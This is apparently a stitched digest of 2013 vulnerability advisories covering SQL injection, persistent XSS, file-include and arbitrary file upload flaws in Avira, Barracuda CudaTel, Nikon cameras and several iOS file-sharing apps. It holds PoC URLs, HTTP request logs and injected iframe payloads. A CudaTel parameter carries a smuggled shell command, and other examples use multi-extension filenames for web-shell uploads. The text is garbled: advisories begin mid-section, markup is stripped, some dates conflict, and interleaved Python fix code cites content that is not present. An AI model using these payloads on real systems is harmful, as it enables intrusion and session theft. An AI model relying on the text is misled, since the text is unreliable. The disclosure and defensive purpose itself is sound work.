Note: When trying to use a single quote or a double quote to check whether the 
parameter is vulnerable or not, you will be redirected to another page, 
but when loading the request with a backslash, new MySQL errors become 
visible for exploitation.


POC: 
https://analysis.avira.com/en/overview?start=0&uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!]


PoC Video:
http://www.youtube.com/watch?v=Odko5PTKA-Q


Reference(s):
https://analysis.avira.com/


Solution:
=
The vulnerability can be patched by restricting and securely parsing the 
uniqueid parameter of the request.
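As an added illustration of that fix (example code, not Avira's), the Python below contrasts the quote-only blocklist the advisory describes, which lets a backslash straight through, with an allowlist check on the uniqueid value followed by a parameterized query. The 32-character alphanumeric id format, the table name and the column names are assumptions; the sample id is the one from the PoC URL above.

```python
import re
import sqlite3

# Value taken from the advisory's PoC URL: an opaque alphanumeric token,
# which is exactly the shape the allowlist below accepts.
SAMPLE_UNIQUEID = "1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg"

# Assumed id format: exactly 32 ASCII letters or digits. Anything else,
# including a trailing backslash or quote, is rejected before any SQL runs.
UNIQUEID_RE = re.compile(r"^[A-Za-z0-9]{32}$")


def blocklist_check(value):
    """The weak approach the advisory describes: only a quote character is
    treated as suspicious (the service redirected on it). A backslash, which
    changes how the following quote in the query is parsed, passes through."""
    return "'" not in value and '"' not in value


def allowlist_check(value):
    """Restrict the parameter to the exact shape a valid id has."""
    return UNIQUEID_RE.fullmatch(value) is not None


def setup_db():
    """Constructed in-memory stand-in for the service's database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE analysis (uniqueid TEXT PRIMARY KEY, filename TEXT)")
    conn.execute("INSERT INTO analysis VALUES (?, ?)", (SAMPLE_UNIQUEID, "sample.exe"))
    conn.commit()
    return conn


def overview(conn, uniqueid):
    """Secure handling of the overview request: validate the id, then bind it
    as a query parameter so the DBMS never interprets it as SQL."""
    if not allowlist_check(uniqueid):
        raise ValueError("invalid uniqueid")
    row = conn.execute(
        "SELECT filename FROM analysis WHERE uniqueid = ?", (uniqueid,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_db()
    for probe in (SAMPLE_UNIQUEID, SAMPLE_UNIQUEID + "\\", SAMPLE_UNIQUEID + "'"):
        print(repr(probe), "blocklist:", blocklist_check(probe),
              "allowlist:", allowlist_check(probe))
    print(overview(db, SAMPLE_UNIQUEID))  # sample.exe
```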


Risk:
=
The security risk of the remote sql injection web vulnerability is estimated as 
critical.


Credits:

Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] 
(ebra...@evolution-sec.com)



Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability

2013-07-10 Thread Vulnerability Lab
.png.gif.php.js.html</a></td>
<td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile('1337.png.gif.php.js.html');" class="transparent_button">Delete</a></td></tr>

1.3
<tr><td><img src="Air%20Drive%20-%20Files_files/file.png" height="20px" width="20px"></td><td><a target="_blank" href="http://192.168.2.104:8000/AirDriveAction_file_show/[PERSISTENT INJECTED SCRIPT CODE!]1337.png">[PERSISTENT INJECTED SCRIPT CODE!]1337.png</a></td><td>27,27KB</td><td align="center">2013-07-08 23:07:52</td><td align="center"><a onclick="javascript:delfile('[PERSISTENT INJECTED SCRIPT CODE!]1337.png');" class="transparent_button">Delete</a></td></tr>


--- Session Request Log ---
Status: 302[Found]

POST http://localhost:8000/AirDriveAction_file_add 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[83] 
Mime Type[text/html]

   
Request Headers:
  
Host[localhost:8000]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  
DNT[1]
  Referer[http://localhost:8000/index_files.html]
  
Connection[keep-alive]
   Post Data:
  
POST_DATA[-228191371227676
Content-Disposition: form-data; name=uploadfile; 
filename=;/private/var/mobile/Applications/1337.png


Reference(s):
http://localhost:8000/AirDriveAction_file_add 


Risk:
=
The security risk of the arbitrary file upload vulnerability and the multiple 
extensions issue are estimated as high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue

2013-07-16 Thread Vulnerability Lab
Title:
==
Nikon CoolPix L Series Fw1.0 - Information Disclosure Issue


Date:
=
2013-07-16


References:
===
http://www.vulnerability-lab.com/get_content.php?id=1014


VL-ID:
=
1014


Common Vulnerability Scoring System:

3.5


Introduction:
=
Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 & 25 is clever 
with images—so you don’t have to be. 
Simple controls and smart automatic technology deliver steady images and ensure 
you capture portraits with smiling 
faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens.

A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any 
time of day or night and you can 
switch to filming the action at the touch of a button, or set the camera to 
Easy Auto mode and capture photos 
without worrying about a thing.

(Copy of the Vendor Homepage: 
http://www.europe-nikon.com/en_GB/product/digital-cameras/coolpix/life/coolpix-l27
 )


Abstract:
=
The Vulnerability Laboratory Research Team discovered an information disclosure 
issue in the Nikon CoolPix Digital Camera L25 with Firmware 1.0.


Report-Timeline:

2013-07-16:Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
Nikon
Product: COOLPIX L25, L27 & L28


Exploitation-Technique:
===
Hardware


Severity:
=
Medium


Details:

An information disclosure issue is detected in the official Nikon Camera L 
Series 25, 28 & maybe others.
The information disclosure bug allows remote attackers to access sensitive 
information of other people, websites, servers or companies.

The privacy issue is located in the menu system module when saving a start 
bild (start picture) that is shown when the camera system boots. The camera 
allows saving a start bild (start picture) and does not remove it when a format 
or firmware reset is performed. People with access to the device can view, in 
the short review of the start bild (start picture), pictures that were deleted 
earlier. The device does not recognize this and keeps the pictures stored 
without any possibility to delete them.

In a scenario on eBay we bought a Nikon camera from a private seller. He used 
the camera for about 2 years for his holiday trips and conferences.
He confirmed in a mail that the camera got a format and firmware reset. When the 
camera arrived at our location we looked into the short 
review of the start bild (start picture) and saw several images of the owner.


Proof of Concept:
=
The information disclosure issue can be reproduced by local attackers with 
physical access to the camera device.

Steps to reproduce ...

1.   Start the Nikon L series camera
2.   Go into the camera screen mode and take a nice picture
3.   Go to System > Start Bild
4.   Choose your own picture and save it as start picture
5.   Now shut down the camera the regular way and start it again after some 
seconds
6.   Our image will be visible when the system boots
7.   Go to the Menu, then to System, and format the device
8.   Go to the Menu again and switch to System
9.   After the format we now reset the device
10. Shut down the Nikon camera and, of course, take out the SD card
11. Restart it, go to the menu and open the start bild (start picture) module
12. Now our image is still visible even though we did a full hardware reset or 
format
13. Information disclosure issue in Nikon L Series successfully reproduced!

Note:
When the image is saved in the camera as the start picture, no format & no 
firmware reset can remove it anymore.


Solution:
=
To fix the vulnerability, make the firmware reset or format remove all pictures 
from the review menu as well.


Risk:
=
The security risk of the information disclosure issue is estimated as medium(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)



FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability

2013-07-16 Thread Vulnerability Lab
--- Session Log ---

Status: 200[OK]

POST http://192.168.2.104:41495/?type=createdir&guid=EFB7891B-84ED-4C48-A404-95960BBB95D0
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Content Size[506] Mime Type[text/plain]
   

Request Headers:
Host[192.168.2.104:41495]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
Accept[text/html, */*; q=0.01]

Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]

X-Requested-With[XMLHttpRequest]
  

Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Content-Length[87]

Connection[keep-alive]

Pragma[no-cache]
Cache-Control[no-cache]

Post Data:
  
item0[%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C]

Response Headers:
  
Accept-Ranges[bytes]
  
Content-Length[506]
  
Content-Type[text/plain]
  
Date[Thu, 11 Jul 2013 18:14:33 GMT]


20:08:50.658[40ms][total 40ms] 
Status: 404[Not Found]
GET http://192.168.2.104:41495/%3C/a 
Load Flags[LOAD_DOCUMENT_URI  ]
Content Size[0] Mime Type[application/x-unknown-content-type]
   

Request Headers:
  
Host[192.168.2.104:41495]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
  

Referer[http://192.168.2.104:41495/?guid=EFB7891B-84ED-4C48-A404-95960BBB95D0&type=child&date=Thu%20Jul%2011%202013%2020:05:48%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:06:26%20GMT+0200&type=child&date=Thu%20Jul%2011%202013%2020:07:33%20GMT+0200]
Connection[keep-alive]
   

Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[Thu, 11 Jul 2013 18:14:34 GMT]


Solution:
=
To fix the vulnerability, parse and restrict the add folder name input field, 
but also clean up the output of the affected listing module.
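The fix described here, for the Air Drive Plus file listing above and for the CudaTel call forwarding listing earlier in this digest, comes down to the same two steps: restrict the name on input and escape it on output. The Python below is an added example of both (not code from any of those products); the allowed extensions, the name grammar and the listing markup are assumptions, and the two rejected inputs are constructed from the names shown in the logs above.

```python
import html
import re
from urllib.parse import quote, unquote

# Constructed inputs modelled on the advisories: the multi-extension file
# name from the Air Drive Plus listing and the folder name the FTP Sprite
# createdir request carried in item0 (URL-decoded here).
AIRDRIVE_NAME = "1337.png.gif.php.js.html"
FTPSPRITE_ITEM0 = unquote(
    "%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert(%22BKM%22)%20%3C"
)

# Assumed policy, not taken from any of the products: one plain base name,
# at most one extension, and only these extensions for files.
ALLOWED_EXTENSIONS = {"png", "gif", "jpg", "jpeg", "pdf", "txt"}
TOKEN_RE = re.compile(r"^[A-Za-z0-9_\-]{1,64}$")


def validate_entry_name(name, kind):
    """Return the accepted name or raise ValueError.

    kind is "file" (exactly one allowlisted extension) or "folder" (no
    extension). Quotes, angle brackets, slashes and extra dots never reach
    storage, so "1337.png.gif.php.js.html" and markup are both rejected."""
    parts = name.split(".")
    if kind == "folder":
        if len(parts) != 1 or not TOKEN_RE.fullmatch(name):
            raise ValueError("folder name must be a single plain token")
        return name
    if kind == "file":
        if len(parts) != 2:
            raise ValueError("file name must have exactly one extension")
        base, ext = parts
        if not TOKEN_RE.fullmatch(base) or ext.lower() not in ALLOWED_EXTENSIONS:
            raise ValueError("disallowed base name or extension")
        return f"{base}.{ext.lower()}"
    raise ValueError("unknown entry kind")


def listing_row(name, size, mtime):
    """Render one listing row. Every dynamic value is escaped for the context
    it lands in: percent-encoded inside the href, HTML-escaped (quotes
    included) in text and attribute positions. The delete action is carried
    in a data attribute instead of an inline onclick handler."""
    href = "/files/" + quote(name, safe="")
    text = html.escape(name, quote=True)
    return (
        f'<tr><td><a href="{href}">{text}</a></td>'
        f"<td>{html.escape(str(size))}</td><td>{html.escape(str(mtime))}</td>"
        f'<td><a class="transparent_button" data-name="{text}">Delete</a></td></tr>'
    )


def render_listing(entries):
    """entries: iterable of (raw_name, kind, size, mtime).

    Returns (html_table, rejected) where rejected lists the names that
    failed validation together with the reason."""
    rows, rejected = [], []
    for raw, kind, size, mtime in entries:
        try:
            name = validate_entry_name(raw, kind)
        except ValueError as exc:
            rejected.append((raw, str(exc)))
            continue
        rows.append(listing_row(name, size, mtime))
    return "<table>" + "".join(rows) + "</table>", rejected


if __name__ == "__main__":
    table, rejected = render_listing([
        ("1337.png", "file", "27,27KB", "2013-07-08 23:07:52"),
        (AIRDRIVE_NAME, "file", "27,27KB", "2013-07-08 23:07:52"),
        (FTPSPRITE_ITEM0, "folder", "-", "2013-07-11 20:05:48"),
    ])
    print(table)
    for raw, reason in rejected:
        print("rejected:", repr(raw), "->", reason)
```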


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability

2013-07-16 Thread Vulnerability Lab
Title:
==
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability


Date:
=
2013-07-15


References:
===
http://www.vulnerability-lab.com/get_content.php?id=776

BARRACUDA NETWORK SECURITY ID: BNSEC-807


VL-ID:
=
776


Common Vulnerability Scoring System:

2.1


Introduction:
=
Designed to enable seamless voice and video communication, the CudaTel
Communication Server is an easy-to-use, affordable, next-generation phone system
for businesses. CudaTel Communication Server's enterprise-class feature set
includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated
attendant services, and more, controlled by an easy-to-use Web interface. CudaTel
Communication Server is compatible with any SIP device and provider, and can be
pre-configured for use with both analog and digital telephone networks.
Powerful, Complete Solution: with an expansive feature set and no per-user or
per-phone licensing fees, the CudaTel Communication Server is equipped and priced
for organizations of any size. Native High Definition audio support and
integrated phone line (TDM) hardware produce an unparalleled audio experience.
VoIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )


Abstract:
=
The Vulnerability Laboratory Research Team discovered a client side web 
vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.


Report-Timeline:

2012-11-26: Researcher Notification & Coordination
2012-11-27: Vendor Notification
2012-12-01: Vendor Response/Feedback
2013-04-03: Vendor Fix/Patch
2012-07-15: Public Disclosure


Status:

Published


Affected Products:
==
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

A client side input validation vulnerability is detected in the Barracuda
Networks CudaTel v2.6.002.040 appliance application. The non-persistent
vulnerability allows remote attackers to manipulate website links to provoke
malicious client side (application-side) requests.

The second vulnerability (client side) is located in the `error:Internal Error`
exception handling. When remote attackers provoke the loading of an invalid
request, the exception handling will display the earlier inserted bbx_hostname
(malicious) web context (e.g. script codes). The attacker can use the vulnerable
bbx_backup_site_host parameter of the test connection listing module to provoke
an evil application exception-handling request.

Successful exploitation of the vulnerability results in client side phishing,
client side session hijacking and client side external redirects to malware or
evil websites. Exploitation of the vulnerability requires medium application
user interaction.

Vulnerable Section(s):
[+] Test - Connection

Vulnerable Module(s):
[+] Exception-handling [Internal Error] - 
Listing

Vulnerable Parameter(s):
[+] bbx_backup_site_host


Proof of Concept:
=
The vulnerability can be exploited by remote attackers with low or medium
required user interaction and without a privileged application user account.
For demonstration or reproduce ...


Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host]

pre--- 
error: Internal error.\n[backup] 
Can't connect to \iframe src=test3-Dateien/a.htm 
href=http://vuln-lab.com/?content-type=text/html;http://vuln-lab.com/a
/pre/body/html/iframe/pre


PoC:
http://cudatel.ptest.cudasvc.com/gui/backup/test
?_=1353975862209bbx_backup_site_id=2bbx_backup_site_type=ftp
bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3Ebbx_backup_site_port=8bbx_backup_site_user=BENJAMINKM
bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff


Solution:
=
The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host
parameter request. Parse the internal error exception handling when processing
to display the error string of the requested parameter (error context).

2013-04-03: Vendor Fix/Patch

Note: Barracuda Networks provided a download in the customer section but also 
automatic update to patch the issue in the appliance series.


Risk:
=
The security risk of the client side input validation vulnerability is 
estimated as medium(-) because of the main location in the exception-handling.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@vulnerability-lab.com)


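To illustrate the fix the Solution section above asks for, here is an added example (not CudaTel code; the handler and function names are assumptions) that validates bbx_backup_site_host before it is used and HTML-escapes whatever is reflected into the "Internal error" message:

```python
"""Hardening the backup 'test connection' error path from the advisory above.
Added example, not CudaTel code: the handler is hypothetical and only models
the two defensive steps, input validation and output encoding."""
import html
import ipaddress
import re
from typing import Dict, Tuple

# One RFC 1123 hostname label: 1-63 letters/digits/hyphens, no edge hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_backup_host(value: str) -> bool:
    """Accept only a syntactically valid hostname or IP literal.

    Angle brackets, quotes, spaces and empty strings all fail here, so they
    never reach the connect() call or the error page.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    host = value[:-1] if value.endswith(".") else value
    return all(_LABEL.match(label) for label in host.split("."))


def render_error_vulnerable(host: str) -> str:
    """The failure mode the advisory describes: the submitted host is
    concatenated into the error body without encoding."""
    return "<pre>error: Internal error.\n[backup] Can't connect to " + host + "</pre>"


def render_error_hardened(host: str) -> str:
    """Same message, but the reflected value is entity-encoded, so a host
    containing markup is displayed as text rather than interpreted."""
    return ("<pre>error: Internal error.\n[backup] Can't connect to "
            + html.escape(host, quote=True) + "</pre>")


def handle_backup_test(params: Dict[str, str]) -> Tuple[int, str]:
    """Hypothetical handler for /gui/backup/test; returns (status, body).

    Validation runs first, so only a well-formed host is ever used; the
    error path still escapes its output as defence in depth.
    """
    host = params.get("bbx_backup_site_host", "")
    if not is_valid_backup_host(host):
        # Reject without echoing the raw value back into the page.
        return 400, "<pre>error: Invalid backup host.</pre>"
    # A real handler would attempt the FTP/SFTP connection here; this
    # constructed example treats every attempt as failed.
    return 502, render_error_hardened(host)


if __name__ == "__main__":
    # Constructed sample value carrying markup, like the one the advisory
    # shows being reflected into the error listing.
    bad = '"><iframe src=http://example.invalid>'
    print(render_error_vulnerable(bad))
    print(render_error_hardened(bad))
    print(handle_backup_test({"bbx_backup_site_host": bad}))
    print(handle_backup_test({"bbx_backup_site_host": "backup.example.com"}))
```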

Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities

2013-07-16 Thread Vulnerability Lab
 are 
estimated as medium(+).


Credits:

Vulnerability Laboratory [Research Team] - Ibrahim Mosaad El-Sayed
[ibra...@evolution-sec.com]






Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities

2013-07-16 Thread Vulnerability Lab
 in the index file dir listing module of the web-server
(http://localhost:8797/) when processing to display, via POST request method,
injected manipulated `folder names`. The persistent script code will be executed
in the main index file dir listing module when the service lists the new
malicious injected foldername as an item.

Exploitation of the persistent web vulnerability requires low or medium user
interaction without an application user account. Successful exploitation of the
vulnerability can lead to persistent session hijacking (customers), account
steal via persistent web attacks, persistent phishing or stable (persistent)
certificate mail notification context manipulation.

Vulnerable Application(s):
[+] Olive File Manager v1.0.1 - iTunes or AppStore (Apple)

Vulnerable Module(s):
[+] Add Folder

Vulnerable Parameter(s):
[+] foldername

Affected Module(s):
[+] Index Folder Listing (http://localhost:8797/)


Proof of Concept:
=
1.1
The file include and arbitrary file upload vulnerability can be exploited by
remote attackers without a privileged application user account and without
required user interaction. For demonstration or reproduce ...

PoC: Filename

div class=file_list_containerdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 
cellspacing=0 width=100%tbodytrtd align=center valign=middle 
width=50/tdtd align=left 
valign=middle width=*a href=/a
/td/tr/tbody/table/divdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 
cellspacing=0 width=100%tbodytrtd align=center valign=middle 
width=50/tdtd align=left 
valign=middle width=*a href=[LOCAL FILE/PATH REQUEST!]/a

(Size:27,27 Kb, Last Modified:2013-07-12 18:34:15)br /
/td/tr/tbody/table/divdiv class=file_list_itemtable width=100% 
height=50px border=0 
cellpadding=0 cellspacing=0tbodytrtd width=50 align=center 
valign=middle/tdtd width=* 
align=left valign=middlea href=[LOCAL FILE/PATH REQUEST!]/a

(Size:27,27 Kb, Last Modified:2013-07-12 18:33:42)br /
/td/tr/tbody/table/div/div/divdiv class=footerdiv 
class=footer_textCopyright © 2008 OliveOffice,Inc.
/div/div/body/html/iframe/a/td/tr/tbody/table/div/div


--- POST Method Request Log ---

POST_DATA[-151253266715950
Content-Disposition: form-data; name=file; filename=[LOCAL FILE/PATH 
REQUEST!].png
Content-Type: image/png


1.2
The persistent input validation web vulnerability can be exploited by remote
attackers without a privileged application user account and with low or medium
required user interaction. For demonstration or reproduce ...

PoC: Foldername

div class=file_list_containerdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 
cellspacing=0 width=100%tbodytrtd align=center valign=middle 
width=50/tdtd align=left 
valign=middle width=*a href=/a
/td/tr/tbody/table/divdiv class=file_list_itemtable 
height=50px border=0 cellpadding=0 cellspacing=0 
width=100%tbodytrtd align=center valign=middle width=50/tdtd 
align=left valign=middle 
width=*a href=%20[PERSISTENT INJECTED SCRIPT CODE!] [PERSISTENT 
INJECTED SCRIPT CODE!]/%20
[PERSISTENT INJECTED SCRIPT CODE!]//a 
(Size:0 Kb, Last Modified:2013-07-12 18:26:31)br /
/td/tr/tbody/table/div/div/divdiv class=footerdiv 
class=footer_textCopyright © 2008 OliveOffice,Inc.
/div/div/body/html/iframe/a/td/tr/tbody/table/div/div


Solution:
=
1.1
The arbitrary file upload web vulnerability and the upload filter bypass issue 
is estimated as high(+).

1.2
The security risk of the persistent input validation vulnerabilities is 
estimated as high(-).


Risk:
=
The security risk of the persistent input validation web vulnerability is 
estimated as high(-).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)



WiFly 1.0 Pro iOS - Multiple Web Vulnerabilities

2013-07-18 Thread Vulnerability Lab
:
=
The vulnerability can be patched by a restriction of the json upload request and
url parameter. The POST request, when processing to upload, needs to be
restricted, encoded and filtered.


Risk:
=
The security risk of the local file/path include & arbitrary file upload
vulnerability is estimated as high.


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)






Flux Player v3.1.0 iOS - File Include Arbitrary File Upload Vulnerability

2013-07-18 Thread Vulnerability Lab
,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Response Headers:
  Accept-Ranges[bytes]
  Content-Length[669]
  Date[Mo., 15 Jul 2013 20:05:02 GMT]



1.2
--- Request Session Log 2 - Arbitrary File Upload ---

Status: 200[OK]

POST http://localhost:8080/ 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[1053] 
Mime 

Type[application/x-unknown-content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
 
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
 DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Post Data:
  POST_DATA[-21961286324572
Content-Disposition: form-data; name=file; 
filename=schoko-drops-337.gif.html.php.js.jpg
Content-Type: image/png
---
Status: 200[OK]

GET http://localhost:8080/schoko-drops-337.gif.html.php.js.jpg  [Included 
File/Path as Filename!]
Load Flags[LOAD_DOCUMENT_URI  ] Content Size[669] Mime 
Type[application/x-unknown-

content-type]
   Request Headers:
  Host[localhost:8080]
  
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 
Firefox/22.0]
  
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  
Accept-Language[en-US,en;q=0.5]
  Accept-Encoding[gzip, deflate]
  DNT[1]
  
Referer[http://localhost:8080/]
  Connection[keep-alive]
   
Response Headers:
  Accept-Ranges[bytes]
  Content-Length[669]
  Date[Mo., 15 Jul 2013 20:05:05 GMT]




Note:
After the upload of the manipulated malicious file (shell or web-shell), the
remote attacker is able to access the full files by deleting the image file
extension. It is also possible to upload a file with multiple file extensions
and to access it with another frame.



PoC:

htmlheadtitleFiles from /titlestylehtml {background-color:#ee} 
body 
{ background-color:#FF; font-family:Tahoma,Arial,Helvetica,sans-serif; font-

size:18x; margin-left:15%; margin-right:15%; border:3px groove #006600; 
padding:15px; } /style/head
bodyh1Files from /h1bqThe following files are hosted 

live from the strongiPhone's/strong Docs folder./bqpa 
href=/abr
a href=.DownloadStatus.DownloadStatus/a   ( 0.0 Kb, 
(null))br
a href=.mpdrm.mpdrm/a ( 0.0 Kb, (null))br
a href=iframe src=a_[File Include/Arbitrary File Upload 
Vulnerability!]/a(0.0 Kb, (null))br /
a href=BKM337/a ( 0.0 Kb, (null))br /
a href=Rem0veRem0ve/a   ( 0.0 Kb, (null))br /
a href=a2b642e7de.jpga2b642e7de.jpg/a ( 0.0 Kb, 
(null))br /
/pform action= method=post enctype=multipart/form-data name=form1 
id=form1labelupload file
input type=file name=file id=file //labellabelinput type=submit 
name=button id=button 
value=Submit //label/form/body/html/iframe/a/p/body/html

Note:
To exploit the issue, the attacker needs to bypass the validation by injecting
2 different scripts (tags). After the upload, the local file or path gets
executed when processing to open the item listing.


Solution:
=
1.1
The vulnerability can be patched by a secure parse of the filenames when
processing to upload via POST method request. Encode and parse the filename
output listing in the index site of the application. Restrict the filename
input and disallow special chars.

1.2
Restrict the input of the filenames when processing to upload a file with
multiple extensions. Encode and parse the filename output listing in the index
site of the application. Restrict the filename input and disallow special chars.
Disallow opening URLs with multiple file extensions to prevent execution of or
access to web-shells.



Risk:
=
1.1
The security risk of the local file include web vulnerability is estimated as 
high.

1.2
The security risk of the arbitrary file upload vulnerability is estimated as 
high(+).


Credits:

Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(b...@evolution-sec.com)


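Added example (not code from Olive File Manager or Flux Player; the extension allowlist and function names are assumptions) of the filename and folder-name restrictions the Solution sections of the Olive File Manager and Flux Player advisories above describe: a single-extension allowlist check on upload, plus a listing renderer that encodes names in both the href and the link text.

```python
"""Upload-name validation and a safe index listing for the iOS file-sharing
web servers in the Olive File Manager and Flux Player advisories above.
Added example, not code from either app; the extension allowlist and the
function names are assumptions."""
import html
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import quote

# Extensions the share is meant to serve; anything else is rejected rather
# than stored under a name the listing page would later link to.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "mp4", "m4a", "pdf", "txt"}

# Conservative stem alphabet: letters, digits, space, '-', '_'.
_STEM = re.compile(r"^[A-Za-z0-9 _-]{1,100}$")


def sanitize_upload_name(raw: str) -> Optional[str]:
    """Return a safe filename, or None when the submitted name must be rejected.

    Rejects path components, dotfiles, names with more than one extension
    (e.g. 'x.gif.html.php.js.jpg'), extensions outside the allowlist, and any
    character that could carry markup into the listing page.
    """
    # Drop any directory part a client may have put in Content-Disposition.
    name = posixpath.basename(raw.replace("\\", "/")).strip()
    if not name or name.startswith("."):
        return None
    parts = name.split(".")
    if len(parts) != 2:  # exactly one stem and one extension
        return None
    stem, ext = parts
    if not _STEM.match(stem) or ext.lower() not in ALLOWED_EXTENSIONS:
        return None
    return f"{stem}.{ext.lower()}"


def sanitize_folder_name(raw: str) -> Optional[str]:
    """Folder names get the same treatment, minus the extension rule."""
    name = posixpath.basename(raw.replace("\\", "/")).strip()
    if not name or name.startswith(".") or not _STEM.match(name):
        return None
    return name


def render_listing(entries: List[Tuple[str, int]]) -> str:
    """Render index rows with each name encoded for the context it lands in:
    percent-encoded in the href, entity-encoded in the link text."""
    rows = []
    for name, size_bytes in entries:
        href = quote(name, safe="")
        text = html.escape(name, quote=True)
        rows.append(f'<a href="/{href}">{text}</a> ({size_bytes / 1024:.2f} Kb)<br />')
    return "\n".join(rows)


if __name__ == "__main__":
    # Constructed samples modelled on the names shown in the advisories.
    for candidate in ["holiday.jpg", "schoko-drops-337.gif.html.php.js.jpg",
                      "../../etc/passwd", "<iframe src=a>.png", ".hidden.jpg"]:
        print(repr(candidate), "->", sanitize_upload_name(candidate))
    print(render_listing([("holiday.jpg", 27924), ("a<b>.txt", 0)]))
```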

Barracuda CudaTel 2.6.02.04 - Multiple Client Side Cross Site Vulnerabilities (Bug Bounty #17)

2013-07-18 Thread Vulnerability Lab
bbx_outbound_route_name: [CLIENT-SIDE SCRIPT CODE!]
bbx_outbound_route_regex: ^\\d{10}$
bbx_outbound_route_type: national
/pre/body/html/iframe#8203;#8203;#8203;#8203;#8203;/pre


PoC:
http://cudatel.127.0.0.1:1338/gui/route/route?%3C[CLIENT-SIDE SCRIPT 
CODE!]%20%3C
http://cudatel.127.0.0.1:1338/gui/route/route?_=1354073910062bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE
 SCRIPT CODE!]%20%3C



1.2
Review: AJAX - HTML  queues_wall_stub - Monitor Queue Link  ops 
opOpenQueueWallboard

